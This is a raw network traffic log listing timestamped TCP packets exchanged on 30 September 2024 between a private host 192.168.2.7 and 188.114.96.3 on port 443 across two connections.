Sep 30, 2024 18:19:11.052772999 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:11.052798986 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:11.054816961 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:11.054838896 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:11.054874897 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:11.054882050 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:11.054913044 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:11.054932117 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:11.055318117 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:11.055344105 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:11.055380106 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:11.055391073 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:11.055407047 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:11.055428028 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:11.055959940 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:11.055983067 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:11.056058884 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:11.056058884 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:11.056066990 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:11.056111097 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:11.056366920 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:11.056386948 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:11.056421041 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:11.056427002 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:11.056451082 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:11.056468010 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:11.057424068 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:11.057452917 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:11.057496071 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:11.057502985 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:11.057523966 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:11.057543993 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:11.093231916 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:11.093269110 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:11.093310118 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:11.093318939 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:11.093353987 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:11.093369961 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:11.139254093 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:11.139277935 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:11.139322042 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:11.139329910 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:11.139358044 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:11.139377117 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:11.141834021 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:11.141865969 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:11.141911030 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:11.141917944 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:11.141941071 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:11.141956091 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:11.141957998 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:11.141976118 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:11.142003059 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:11.142007113 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:11.142031908 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:11.142038107 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:11.142064095 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:11.142092943 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:11.142502069 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:11.142530918 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:11.142569065 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:11.142575026 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:11.142601967 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:11.142613888 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:11.143170118 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:11.143203974 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:11.143240929 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:11.143246889 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:11.143274069 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:11.143291950 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:11.143644094 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:11.143673897 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:11.143732071 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:11.143738985 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:11.143776894 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:11.144175053 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:11.144200087 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:11.144237995 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:11.144244909 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:11.144270897 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:11.144284964 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:11.185137987 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:11.185173035 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:11.185300112 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:11.185308933 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:11.185357094 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:11.230196953 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:11.230230093 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:11.230453968 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:11.230464935 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:11.230514050 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:11.231914997 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:11.231941938 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:11.232006073 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:11.232012987 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:11.232050896 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:11.232702971 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:11.232729912 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:11.232768059 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:11.232774019 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:11.232801914 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:11.232822895 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:11.233110905 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:11.233130932 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:11.233165026 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:11.233170986 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:11.233198881 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:11.233220100 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:11.233364105 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:11.233383894 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:11.233421087 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:11.233426094 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:11.233453035 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:11.233474016 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:11.234122038 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:11.234144926 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:11.234189034 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:11.234194994 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:11.234224081 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:11.234242916 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:11.234435081 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:11.234498024 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:11.234503031 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:11.234525919 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:11.234570026 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:11.251600027 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:11.251614094 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:11.849497080 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:11.849550962 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:11.849623919 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:11.857389927 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:11.857422113 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.321377039 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.321460962 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:12.343772888 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:12.343803883 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.344132900 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.370522976 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:12.415399075 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.486366034 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.488480091 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.488516092 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.488542080 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:12.488554955 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.488569021 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.488595963 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:12.488629103 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.488662958 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:12.488663912 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.488675117 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.488723040 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:12.488734961 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.488804102 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.488842964 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:12.488850117 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.491826057 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.491866112 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:12.491877079 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.546168089 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:12.572428942 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.572513103 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.572546959 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:12.572547913 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.572561979 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.572602987 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:12.572609901 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.572648048 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.572678089 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:12.572685003 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.573484898 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.573523045 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:12.573530912 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.573674917 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.573704958 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.573704958 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:12.573724985 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.573756933 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:12.574397087 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.574592113 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.574628115 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:12.574631929 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.574642897 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.574681997 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:12.575195074 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.575258017 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.575293064 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:12.575299978 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.575432062 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.575468063 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:12.575475931 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.613100052 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.613137960 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.613162994 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:12.613178968 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.613214016 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:12.659286022 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.659415960 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.659450054 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.659454107 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:12.659470081 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.659501076 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:12.659508944 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.659776926 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.659822941 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:12.659830093 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.659868002 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:12.660181046 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.660224915 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.660235882 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:12.660243034 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.660280943 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:12.661056042 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.661108017 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:12.661117077 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.661133051 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.661170006 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:12.661878109 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.661909103 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.661930084 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:12.661937952 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.661958933 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:12.662996054 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.663038969 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:12.663048029 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.663088083 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:12.663165092 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.663213968 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:12.663222075 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.663265944 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:12.663862944 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.663917065 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:12.701515913 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.701565981 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.701591015 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:12.701603889 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.701616049 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:12.746511936 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.746560097 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.746567965 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:12.746587038 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.746603966 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:12.746612072 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.746629000 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.746650934 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:12.746656895 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.746678114 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:12.746726990 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.746762037 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:12.746767998 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.746803999 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:12.747023106 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.747056961 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.747070074 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:12.747076988 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.747096062 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:12.747114897 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:12.747564077 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.747608900 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:12.747680902 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.747726917 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:12.747879982 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.747929096 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:12.747939110 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.747952938 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.747977018 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:12.747993946 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:12.748584032 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.748629093 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:12.748646021 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.748684883 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:12.748765945 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.748810053 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:12.748816967 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.748862028 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:12.749639988 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.749691010 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.749691963 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:12.749702930 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.749728918 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:12.749746084 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:12.749824047 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.749874115 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:12.750452042 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.750497103 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:12.750680923 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.750722885 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.750726938 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:12.750735044 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.750777006 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:12.789151907 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.789235115 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:12.789495945 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.789545059 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:12.789700985 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.789743900 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.789747000 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:12.789757967 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.789783955 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:12.789803982 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:12.833868980 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.833928108 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.833934069 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:12.833952904 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.833973885 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:12.833996058 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:12.834003925 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.834018946 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.834059000 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:12.834064007 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.834100008 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:12.834986925 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.835005999 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.835042000 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:12.835050106 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.835063934 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:12.835083961 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:12.835988998 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.836014032 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.836061001 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:12.836070061 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.836102009 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:12.836749077 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.836787939 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.836816072 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:12.836822033 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.836841106 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.836846113 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:12.836863995 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:12.836869001 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.836895943 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:12.836963892 CEST	49704	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:12.875437975 CEST	443	49704	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:12.875463963 CEST	443	49704	188.114.96.3	192.168.2.7
